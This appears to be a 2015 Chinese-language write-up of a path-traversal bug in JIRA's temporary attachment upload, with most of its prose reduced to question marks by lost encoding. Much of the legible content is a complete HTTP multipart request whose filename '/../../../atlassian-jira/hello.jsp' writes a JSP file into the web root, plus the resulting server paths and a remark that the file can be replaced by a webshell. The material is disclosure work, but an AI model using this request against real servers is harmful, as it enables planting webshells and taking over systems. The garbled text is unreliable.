???BUG??????JIRA?????????????

???????????? ???????[ 2015/5/8 11:24:44 ] ??????????????????

???????31?У???????????????????????????У?filename???????κι????????????????????????????????????????
????31 tempAttachmentFile = new File(tmpDir?? uniqueId + "_" +
????fileName);
?????????
????13 [...]createTemporaryAttachment(filePart.getName()??
????filePart.getContentType()?? filePart.getInputStream());
???????????
?????????????????????????????????????????????????????????web?????????/atlassian-jira/?????????????????????????ж??????????й????????????????JSP shell???????????
POST
/rest/collectors/1.0/tempattachment/multipart/2c1ce5fa HTTP/1.1
Host:
hackme.atlassian.net
Cookie:
atlassian.xsrf.token=BQ79-A85Q-7DOM-UMFN|e98231aaaef98a0d9dc7c52e87f4e84cf9cd3085
Connection:
keep-alive
Content-Type:
multipart/form-data;
boundary=---------------------------16266315542468
Content-Length:
345
-----------------------------16266315542468
Content-Disposition:
form-data; name="screenshot";
filename="/../../../atlassian-jira/hello.jsp"
Content-Type:
text/plain
<h1>
Hello
world!</h1>
-----------------------------16266315542468
?????????е??????"/../../../atlassian-jira/hello.jsp"??????uniqueid????????????·????
??????Windows?????
????C:Program
????FilesAtlassianApplication
????DataJIRAcaches mp_attachments6177763437089900999_/../../../atlassian-jira/hello.jsp
??????Linux?????
????/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_/../../../atlassian-jira/hello.jsp
??????windows????·?????淶???"C:Program
????FilesAtlassianApplication DataJIRAatlassian-jirahello.jsp"??????????д?????仰???Linux?????????????????·????????????"/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_"???????????????????á?
?????????????????????滻????webshell??
??????????
???????????????????Jira???????????????????????????????У???ο?????????????檔

????1 2????

???????????????????????漰???????????????????SPASVOС??(021-61079698-8054)?????????????????????????